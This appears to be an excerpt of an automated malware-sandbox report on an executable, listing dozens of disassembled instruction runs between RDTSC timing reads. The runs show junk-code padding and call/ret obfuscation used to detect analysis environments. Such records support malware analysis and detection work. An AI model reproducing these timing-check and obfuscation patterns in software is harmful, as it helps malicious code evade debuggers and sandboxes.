                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C51562 second address: C51566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C51AEE second address: C51AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C51AF8 second address: C51B06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C51B06 second address: C51B16 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C51B16 second address: C51B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53443 second address: C53447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53447 second address: C5344D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C5344D second address: C53452 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53452 second address: C534BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 5B100C25h 0x0000000e call 00007F9C81394C07h 0x00000013 mov dword ptr [ebp+122D34AFh], eax 0x00000019 pop esi 0x0000001a push 00000003h 0x0000001c sub ecx, dword ptr [ebp+1244A36Eh] 0x00000022 push 00000000h 0x00000024 cmc 0x00000025 pushad 0x00000026 add ax, 8B9Eh 0x0000002b mov di, 4100h 0x0000002f popad 0x00000030 push 00000003h 0x00000032 cmc 0x00000033 push D6AFA2B8h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007F9C81394C04h 0x00000040 jnc 00007F9C81394BF6h 0x00000046 popad 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C534BA second address: C53529 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 16AFA2B8h 0x00000010 pushad 0x00000011 or edi, 2CFC2A86h 0x00000017 mov si, D980h 0x0000001b popad 0x0000001c lea ebx, dword ptr [ebp+1244F31Ah] 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F9C80FB5668h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000019h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov edi, 224C83DAh 0x00000041 mov edx, dword ptr [ebp+122D25C6h] 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F9C80FB566Ah 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53529 second address: C5352F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C5352F second address: C53539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C536AB second address: C536B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C536B1 second address: C536B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C5375D second address: C5377B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C5377B second address: C53781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53781 second address: C537AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop edx 0x00000009 popad 0x0000000a nop 0x0000000b xor esi, 6208B49Dh 0x00000011 push 00000000h 0x00000013 mov ecx, dword ptr [ebp+122D3865h] 0x00000019 call 00007F9C81394BF9h 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007F9C81394BF6h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C5387E second address: C53884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53884 second address: C538A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F9C81394BF6h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jns 00007F9C81394BF6h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C538A1 second address: C538B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C80FB5671h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C538B6 second address: C538BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C538BA second address: C538F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnc 00007F9C80FB566Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 je 00007F9C80FB5685h 0x0000001a pushad 0x0000001b jmp 00007F9C80FB5677h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C538F6 second address: C53915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F9C81394BFCh 0x00000011 jne 00007F9C81394BF6h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53915 second address: C53951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a movzx ecx, di 0x0000000d lea ebx, dword ptr [ebp+1244F32Eh] 0x00000013 mov dword ptr [ebp+122D2477h], eax 0x00000019 or edx, dword ptr [ebp+122D2848h] 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9C80FB566Bh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53951 second address: C53957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C72DBF second address: C72DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C72DC7 second address: C72DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C72EF1 second address: C72EF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73056 second address: C7306C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F9C81394BF6h 0x00000010 jns 00007F9C81394BF6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7306C second address: C73072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C731AE second address: C731B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73494 second address: C7349E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7349E second address: C734A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C734A4 second address: C734BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F9C80FB5674h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C739A9 second address: C739B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9C81394BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C739B3 second address: C739B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C739B7 second address: C739CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C81394BFAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F9C81394BFCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C739CF second address: C739DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 js 00007F9C80FB5666h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C739DD second address: C739E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73B4E second address: C73B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73B54 second address: C73B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73B5C second address: C73B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73B61 second address: C73B66 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C4C13C second address: C4C170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5677h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F9C80FB5676h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73CA7 second address: C73CDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9C81394BFEh 0x00000010 jmp 00007F9C81394BFAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7425E second address: C7427B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F9C80FB5674h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7497A second address: C7498F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F9C81394BFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A618 second address: C7A61E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A61E second address: C7A634 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F9C81394BF6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A7A5 second address: C7A7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A7AA second address: C7A7AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A7AF second address: C7A7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F9C80FB566Dh 0x0000000f pop edx 0x00000010 pop edx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F9C80FB566Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A7D6 second address: C7A7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A7DA second address: C7A802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9C80FB566Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push esi 0x00000010 push edx 0x00000011 jne 00007F9C80FB5666h 0x00000017 pop edx 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A802 second address: C7A806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A8B9 second address: C7A8BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A8BD second address: C7A8CF instructions: 0x00000000 rdtsc 0x00000002 je 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F9C81394BF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7EFD7 second address: C7EFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 jc 00007F9C80FB566Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7EFE8 second address: C7F02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C81394C02h 0x00000009 jmp 00007F9C81394C00h 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F9C81394BF6h 0x00000016 jmp 00007F9C81394C07h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7F02D second address: C7F031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7F2FD second address: C7F303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7F303 second address: C7F307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82FB1 second address: C82FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82FB5 second address: C82FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C830DD second address: C830E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C830E1 second address: C830FD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F9C80FB566Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C832FE second address: C83303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8362B second address: C83635 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C83635 second address: C83648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C81394BFFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C83750 second address: C83754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C84358 second address: C843A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F9C81394BF8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push esi 0x00000028 mov si, dx 0x0000002b pop esi 0x0000002c mov esi, eax 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push ecx 0x00000033 pop ecx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C868E2 second address: C8693F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F9C80FB5668h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D1D51h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 pushad 0x0000001a and si, 17D6h 0x0000001f mov ecx, 53D1D7F1h 0x00000024 popad 0x00000025 pop edi 0x00000026 push 00000000h 0x00000028 xor edi, dword ptr [ebp+122D3951h] 0x0000002e xchg eax, ebx 0x0000002f jl 00007F9C80FB5676h 0x00000035 jmp 00007F9C80FB5670h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F9C80FB5673h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8712C second address: C8713E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9C81394BF6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C88076 second address: C8807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C88334 second address: C88352 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F9C81394BF6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f jmp 00007F9C81394BFDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8713E second address: C8715A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5677h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8807B second address: C88081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C88081 second address: C88085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C898C0 second address: C89902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F9C81394BF8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 jmp 00007F9C81394BFDh 0x0000002a push 00000000h 0x0000002c mov si, di 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C89902 second address: C89907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8BDE8 second address: C8BDEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8A12C second address: C8A130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C3E7AA second address: C3E7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8C43C second address: C8C440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C90132 second address: C90136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C90136 second address: C9013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8F206 second address: C8F20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8F20F second address: C8F213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
